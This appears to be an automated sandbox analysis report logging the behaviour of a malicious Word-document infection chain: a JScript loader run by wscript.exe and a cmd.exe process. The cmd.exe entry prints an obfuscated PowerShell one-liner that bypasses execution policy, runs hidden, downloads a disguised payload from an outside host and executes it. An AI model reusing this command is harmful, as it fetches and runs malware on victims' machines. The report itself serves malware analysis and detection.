Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:14
OS Process Information
»
Information Value
PID 0xbc4
Parent PID 0xba0 (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BA8
0x B94
0x 6F4
0x 52C
0x B58
0x 81C
0x 3D4
Host Behavior
File (48)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0 type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 3
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 5
Fn
Get Info C:\Users type = file_attributes True 2
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 4096 True 5
Fn
Data
Read - size = 4096, size_out = 2530 True 1
Fn
Data
Read - size = 542, size_out = 0 True 1
Fn
Read - size = 4096, size_out = 0 True 1
Fn
Registry (144)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value - value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value - value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (64)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 58
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Process #19: wscript.exe
160 0
»
Information Value
ID #19
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:16, Reason: Child Process
Unmonitor End Time: 00:01:22, Reason: Self Terminated
Monitor Duration 00:00:05
OS Process Information
»
Information Value
PID 0x8c0
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 8C4
0x 828
0x 614
0x 358
0x 610
0x 878
0x A1C
0x 178
0x C4
0x BEC
Host Behavior
COM (4)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Registry (29)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 80, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 80, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 80, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 80, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value - value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module (20)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Load ole32.dll base_address = 0x7fefea30000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xff540000 True 2
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefea30000 True 1
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefd730710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefea4c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefea57490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefd72e470 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefd72f660 True 1
Fn
Create Mapping C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 5200480 True 1
Fn
System (68)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:19 (UTC) True 1
Fn
Get Time type = Ticks, time = 147374 True 1
Fn
Get Time type = Performance Ctr, time = 20159713919 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:46:20 (UTC) True 3
Fn
Get Time type = Ticks, time = 148107 True 1
Fn
Get Time type = Performance Ctr, time = 20233210442 True 1
Fn
Get Time type = Ticks, time = 148122 True 2
Fn
Get Time type = Ticks, time = 148653 True 1
Fn
Get Time type = Performance Ctr, time = 20288422870 True 1
Fn
Get Time type = Ticks, time = 148668 True 1
Fn
Get Time type = Performance Ctr, time = 20289424671 True 1
Fn
Get Time type = Ticks, time = 149370 True 5
Fn
Get Time type = Ticks, time = 149386 True 2
Fn
Get Time type = Ticks, time = 149402 True 11
Fn
Get Time type = Ticks, time = 149682 True 5
Fn
Get Time type = Ticks, time = 149698 True 6
Fn
Get Time type = Ticks, time = 149714 True 4
Fn
Get Time type = Ticks, time = 149948 True 3
Fn
Get Time type = Ticks, time = 149963 True 3
Fn
Get Time type = Ticks, time = 149979 True 1
Fn
Get Time type = Ticks, time = 150213 True 1
Fn
Get Time type = Ticks, time = 150244 True 3
Fn
Get Time type = Ticks, time = 150478 True 1
Fn
Get Info type = Operating System True 4
Fn
Get Info type = System Directory, result_out = lõ True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #20: cmd.exe
61 0
»
Information Value
ID #20
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:16, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:03:08
OS Process Information
»
Information Value
PID 0x41c
Parent PID 0xbb0 (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 8F0
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
